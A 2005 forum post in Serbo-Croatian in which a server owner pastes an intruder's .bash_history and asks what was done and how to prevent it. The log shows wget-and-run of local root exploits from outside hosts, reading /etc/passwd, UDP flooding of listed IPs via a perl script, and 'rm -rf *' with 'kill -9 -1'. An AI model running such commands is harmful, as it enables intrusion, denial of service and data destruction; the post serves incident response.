[ pStevica @ 04.02.2005. 16:42 ] @
evo vam sadržaj .bash_history fajla koji se nalazio u /tmp Code: <?xml version = "1.0"?> <Request version = "1.0" timestamp = "6/3/2003 10:14:11 AM"> <param id = "_ActionId" value = "PING" type = "string"/> DOTI0000001Bint main() { return(0); } uname -a cd /tmp wget andyhot.di.uoa.gr/brk2 chmod +x brk2 ./brk2 ./brk2 ls cd /tmp ls mkdir .f cd .f ls wget http://hoob.webcindario.com/brk2 chmod 777 brk2 chmod a+x brk2 ./brk2 cat etc/issue locate httpd.conf cat cat /usr/local/apache/conf/httpd.conf |grep ServerName ls wget www.ducas7.com.br/insecurity/mr chmod 777 mr chmod a+x mr ./mr wget www.ducas7.com.br/insecurity/ wget www.ducas7.com.br/insecurity/kmod wget www.ducas7.com.br/insecurity/brk3 wget www.ducas7.com.br/insecurity/brk wget www.ducas7.com.br/insecurity/brk1 USER co "" "*adresa mog server*" :co2 w cd /var/tmp ls -al wget geocities.com/mickeymhack/x.tar.gz tar zxf x.tar.gz cd slider ./x cat /etc/passwd|grep *mojusername* ./x wget geocities.com/mickeymhack/y.tar.gz tar zxf y.tar.gz ./loginx cat /etc/issue uname -a wget geocities.com/mickeymhack/superbsd.tgz tar zxf superbsd.tgz cd obake ./7.sh ./3 exec ./3 4155 cd /var/tmp/slider cd obake ls -al ./5 ./6 -d ./6 -e wget geocities.com/mickeymhack/root.tar.gz tar zxf root.tar.gz cd root ./memo id ./memo ./x local/x exec local/x 14083 c d/var/tmp ls -al cat /etc/passwd|grep np* cd /home/*mojusername* ls -al cd www ls -al cat index.php cd cgi-bin ls -al cat randhtml.cgi PuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTY6cPuTTYPuTTYPuTTYPuTTY p perl randhtml.cgi ls -al perl entropybanner.cgi cd cgiecho perl cgiecho cd .. ls -al cd /var/tmp ls -al passwd cd /var/tmp rm -rf * kill -9 -1 id ls uname -a w ps aux cd ls cd ls pwd cd .. pwd cd .. pwd ls cd .. ls cd ls wget ftp://83.132.192.24/sys.pl chmod +x sys.pl ./sys.pl wget ftp://83.132.192.24/mremap_pte chmod +777 mremap_pte ./mremap_pte 0 ./mremap_pte 0 ./mremap_pte 0 ./mremap_pte 0 ./mremap_pte 0 id ./mremap_pte 0 ./mremap_pte 0 ./mremap_pte 0 ./mremap_pte 0 ./mremap_pte 0 ps x ps aux ls rm -rf mremap_pte wget ftp://83.132.192.24/udp.pl chmod +x udp.pl ./udp.pl 208.53.149.89 0 0 ps x kill -9 23970 ./udp.pl 67.15.113.18 0 0 e ps x wget ftp://83.132.192.24/jr.txt perl jr.txt host 212.113.174.10 exit ls -a cd var cd tmp ls -a wget http://www.intranorth.com.br/xpl/xpl_brk;chmod 777 xpl_brk;./xpl_brk wget http://hoob.webcindario.com/xpl_brk;chmod 777 xpl_brk;./xpl_brk wget http://hoob.webcindario.com/brk2;chmod 777 brk2;./brk2 http://www.intranorth.com.br/xpl/mremap_pte wget http://www.intranorth.com.br/xpl/mremap_pte;chmod 777 mremap_pte;./mremap_pte exit w cd ls perl jr.txt exit id uname -a w cd ls wget http://www.thecurse.pop.com.br/xpl/l/brk chmod +777 brk ./brk rm -rf brk wget ftp://83.132.192.24/jp.txt ps aux perl jp.txt exit exit ls cd /var/tmp ls rm r* ls less jp.txt Možete li mi malo objasniti šta je haker sve u radio i šta da preduzmem da se ovo više ne ponovi? |